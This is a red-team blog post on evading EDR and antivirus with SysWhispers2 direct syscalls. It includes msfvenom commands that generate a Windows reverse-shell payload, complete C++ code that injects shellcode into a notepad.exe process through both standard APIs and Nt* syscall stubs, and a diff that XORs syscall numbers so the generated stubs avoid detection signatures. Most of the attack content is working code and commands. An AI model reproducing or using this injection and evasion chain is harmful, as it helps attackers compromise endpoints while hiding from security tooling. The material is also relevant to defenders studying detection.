Disclaimer

I started working on this post some time ago, and the new research/stuff was announced in between. I will not address SysWhispers3, very recent technique of Resolving SSN using Exception Directory and many others.

The problematic EDRs

The following post will cover SysWhispers2 along with brief discussion of problems the tool is meant to address.

Modern workstations are likely to be running multiple security solutions. Such security-in-depth approach is one of the core concepts implemented in mature environments. Assuming that attacker already gained remote access to the system, have bypassed any whitelisting, but has not yet elevated privileges – what are attacker’s next steps? This is very interesting question, the recent twitter discussion started by @HackingLZ shows that many red teamers will simply jump elsewhere (i.e. typically servers where security solutions are absent), but others will try to achieve persistency on local station or elevate privileges to dump credentials. Of course, any offensive action will be analyzed by the EDR, reported to SIEM and may trigger unwanted alerts. To simply disable or fully blind EDR, attacker would likely need local admin privileges. So, do we elevate privileges to disable EDR or disable EDR to elevate privileges? :)

We’re going to cover a bit simpler situation where only single process should evade EDR detection, but the rest still applies. Whatever we decide to run, it’s probably going to create new process / thread - operation that is hooked and observed by majority of EDRs. Any changes to memory page protection bits, writing new data, and calling the code are even more likely to be hooked. The hooks may be created on multiple levels - the very basic API, the more specialized API, or the undocumented API (most likely as it is where transition to kernel mode actually happens). Hooks may be easy to spot and remove (i.e. jmp 12345678 at the begining of standard API stub), or much harder (i.e. our memory view is completely faked as in this case). Whichever it is, we still need to somehow edit the memory, but the actuall API to do that is also hooked. Argh!

This is where syscalls come for the rescue. Instead of using the hooked API, we can prepare CPU registers and call the kernel transition manually (using syscall opcode). Historically, the technique had major limitation - the arguments (numbers associated with the syscall) are undocumented and may change with every Windows release. The original SysWhispers supported --versions option to generate syscalls’ stubs for different Windows releases. This technique was based on syscall table maintained by @j00ru. The obvious limitation of this approach is lack of support for future releases and having to maintain dedicated lists.

The next project - SyWhispers2 solved this by implementing sorting of syscalls by their addresses. The technique is described on MDSec blog but in summary:

  • All Zw* stubs are discovered
  • The naming is converted into Nt*
  • Stubs are sorted by their address
  • The order represents incrementing syscall ids

With an array of syscall numbers, attacker may implement arbitrary syscall routines for the ones that are needed. The EDR’s hooks obviously will not cover those.

Sample project

Before we even grab SysWhispers2, let’s implement basic project. I’m going to generate very simple shellcode using msfvenom. The simple reverse shell requires proper encryption / obfuscation prior to use as its easily detected by AVs. To generate it, one can start metasploit container as: docker run --rm -it -v "${PWD}:/out" metasploitframework/metasploit-framework, and then type following commands:

use payload/windows/x64/shell_reverse_tcp
setg LHOST 192.168.1.1
setg EXITFUNC thread
generate -f raw -o /out/shellcode.dat

This should generate simple reverse shell payload that is also easily detectable by any modern AV. To mitigate this, we need to encrypt it.

Container with msf console

To implement the most basic thread injection, we need following pices:

  1. finding target (e.g. process of given name)
  2. loading shellcode (e.g. reading from file)
  3. decrypting the shellcode
  4. opening target process with approperiate access rights
  5. allocating new memory inside target process (e.g. via VirtualAllocEx)
  6. writing shellcode into that memory (e.g. via WriteProcessMemory)
  7. creating and starting remote thread (e.g. via CreateRemoteThread)

EDR would typically hook at least last 4 of the above steps if not all of them. If payload is properly handled, the AV should not alert.

The above points are implemented using following code (C++17):

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
#include <iostream>
#include <fstream>
#include <vector>
#include <string>

#include <Windows.h>
#include <tlhelp32.h>

typedef std::vector<uint8_t> Buffer;

unsigned int FindTarget(const char* process) {
	PROCESSENTRY32 pe32;
	unsigned int pid = 0;

	HANDLE hProcSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	if (INVALID_HANDLE_VALUE == hProcSnap) return 0;

	pe32.dwSize = sizeof(PROCESSENTRY32);

	if (!Process32First(hProcSnap, &pe32)) {
		CloseHandle(hProcSnap);
		return 0;
	}

	while (Process32Next(hProcSnap, &pe32)) {
		if (lstrcmpiA(process, pe32.szExeFile) == 0) {
			pid = pe32.th32ProcessID;
			break;
		}
	}

	CloseHandle(hProcSnap);

	return pid;
}

Buffer Load(const std::string& path) {
	std::ifstream f(path, std::ios::in | std::ios::binary);
	Buffer buf((std::istreambuf_iterator<char>(f)), std::istreambuf_iterator<char>());
	return std::move(buf);
}

unsigned char* Decrypt(unsigned char* shellcode) {
	// FIXME: in-place shellcode decryption
	return shellcode;
}

int Inject(const HANDLE hProcess, unsigned char* shellcode, size_t len) {
	LPVOID pRemoteCode = VirtualAllocEx(hProcess, NULL, len, MEM_COMMIT, PAGE_EXECUTE_READ);

	if (!pRemoteCode) {
		return -1;
	}

	auto shellcode_decrypted = Decrypt(shellcode);

	WriteProcessMemory(hProcess, pRemoteCode, (PVOID)shellcode_decrypted, len, (SIZE_T*)NULL);

	// clear from memory, just in case
	ZeroMemory(shellcode_decrypted, len);	

	HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteCode, NULL, 0, NULL);
	if (hThread != NULL) {
		WaitForSingleObject(hThread, 500);
		CloseHandle(hThread);

		return 0;
	}

	return -1;
}

int main(int argc, char** argv) {
	auto pid = FindTarget("notepad.exe");
	auto shellcode = Load("shellcode.dat");
	
	// try to open target process	
	HANDLE hProc = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION |
		PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE,
		FALSE, (DWORD)pid);
	std::shared_ptr<void> safe_h(hProc, &::CloseHandle);

	Inject(hProc, shellcode.data(), shellcode.size());
}

If any running notepad instance is found (and there is no EDR obviously), you should receive new revshell connection on port 4444.

Because we’re not trying to evade anything, there’s also thread that stands out when probed with Process Hacker and memory region where one could see decrypted shellcode bytes:

New thread Container with msf console

SysWhispers2

The above code works fine. But if you enable EDR - it will detect, block, and report. Not cool.

So, let’s try to solve this problem with SysWhispers2. Let’s replace the Inject() code with code that uses unhooked Nt* variants. First, we need to generate header, c file and asm file, as described on Github page. Once done and VS project is reconfigured, we end up with following implementation:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
int Inject(const HANDLE hProcess, unsigned char* shellcode, size_t len) {
	LPVOID buffer = nullptr;
	SIZE_T buffer_size = len;
	NtAllocateVirtualMemory(hProcess, &buffer, 0, &buffer_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

	if (!buffer) {
		return -1;
	}

	auto shellcode_decrypted = Decrypt(shellcode);

	NtWriteVirtualMemory(hProcess, buffer, (PVOID)shellcode, len, nullptr);

	// clear from memory, just in case
	ZeroMemory(shellcode_decrypted, len);

	ULONG oldProtect;
	NtProtectVirtualMemory(hProcess, &buffer, &buffer_size, PAGE_EXECUTE_READ, &oldProtect);

	HANDLE hThread = NULL;
	NtCreateThreadEx(&hThread, GENERIC_EXECUTE, NULL, hProcess, buffer, nullptr, FALSE, 0, 0, 0, nullptr);

	if (hThread != NULL) {
		WaitForSingleObject(hThread, 500);
		CloseHandle(hThread);

		return 0;
	}

	return -1;
}

The standard function calls were replaced with calls to wrapped NT* calls. Their definitions are in generated asm file. For instance, the NtCreateThreadEx is defined as:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
NtCreateThreadEx PROC
	mov [rsp +8], rcx          ; Save registers.
	mov [rsp+16], rdx
	mov [rsp+24], r8
	mov [rsp+32], r9
	sub rsp, 28h
	mov ecx, 050D21C16h        ; Load function hash into ECX.
	call SW2_GetSyscallNumber  ; Resolve function hash into syscall number.
	add rsp, 28h
	mov rcx, [rsp +8]          ; Restore registers.
	mov rdx, [rsp+16]
	mov r8, [rsp+24]
	mov r9, [rsp+32]
	mov r10, rcx
	syscall                    ; Invoke system call.
	ret
NtCreateThreadEx ENDP

The magic number representing hash will be different on your system. It’s a random value generated along with files. Let’s give it a try.

The message you will likely see is that VIRUS HAS BEEN DETECTED. Oh no. The problem we’re seeing is that syscall opcode is being detected and flagged as malicious. It is extremely unlikely to ever need this in user-code, hence the alert. What is normal for trusted Microsoft DLLs, is not normal for user code. The same problem has been described by Capt. Meelo blogpost. The suggested solution was to rename the syscall to int 2Eh1 opcode which is functionally the same. Spoiler alert: it doesn’t work anymore.

There are different tricks - e.g. egghunting for syscall opcode - that are elegant and working, but I wanted to show something simpler.

Patching SysWhispers2

While trying to understand if it’s really the mere presence of syscall opcode or something more advanced, I discovered that a bit more is verified. syscall is really two bytes instruction, so likely it wouldn’t be very beneficial to treat any software that ships with 0x0f 0x05 anywhere in the code as malicious. This is a good news - it means all we have to do is to make the code flow harder to process for EDR/AV.

Initially, I’ve tried to implement something advanced, but soon realized that even simplest flow modifications are sufficient. Hence, my final patch to SysWhispers2 is:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
diff --git a/data/base.c b/data/base.c
index cd5a77d..78e6147 100644
--- a/data/base.c
+++ b/data/base.c
@@ -112,7 +112,7 @@ EXTERN_C DWORD SW2_GetSyscallNumber(DWORD FunctionHash)
     {
         if (FunctionHash == SW2_SyscallList.Entries[i].Hash)
         {
-            return i;
+            return i ^ 11;
         }
     }

diff --git a/syswhispers.py b/syswhispers.py
index 7a1810b..0c4aa32 100644
--- a/syswhispers.py
+++ b/syswhispers.py
@@ -146,6 +146,7 @@ class SysWhispers(object):
         code += '\tsub rsp, 28h\n'
         code += f'\tmov ecx, 0{function_hash:08X}h        ; Load function hash into ECX.\n'
         code += '\tcall SW2_GetSyscallNumber  ; Resolve function hash into syscall number.\n'
+        code += '\txor rax, 11                ; Extra step xor to bypass some signatures.\n'
         code += '\tadd rsp, 28h\n'
         code += '\tmov rcx, [rsp +8]          ; Restore registers.\n'
         code += '\tmov rdx, [rsp+16]\n'

The base.c does not return syscall number anymore. Instead value XOR’ed with arbitrary number 11. Each asm routine has to XOR again to undo the operation and get original syscall number. That’s it. With this little patch - we can keep whispering the syscalls.

Recompiled application will not trigger any EDR or AV alerts (at least on my setup).

What’s next?

The described patch simply bypasses existing signatures. Obvious improvement would be to use random XOR operand, add more math operations, etc. The real problem is different - is syscall originates from user-code, then EDR can detected this afterwords by using Hooking Nirvana techniques and registering additional callbacks via PspSetCreateProcessNotifyRoutine.

If EDR comes with kernel-driver, the only option to fully bypass it would be to also have code running in kernel-mode context. This doesn’t mean we can’t win here and there, or use different tricks to disable the driver.

Hope you liked the post!


  1. There is an interesting Twitter discussion on what int 2eh really is and how it’s related to VMX: https://twitter.com/Liran_Alon/status/967540990901923840 ↩︎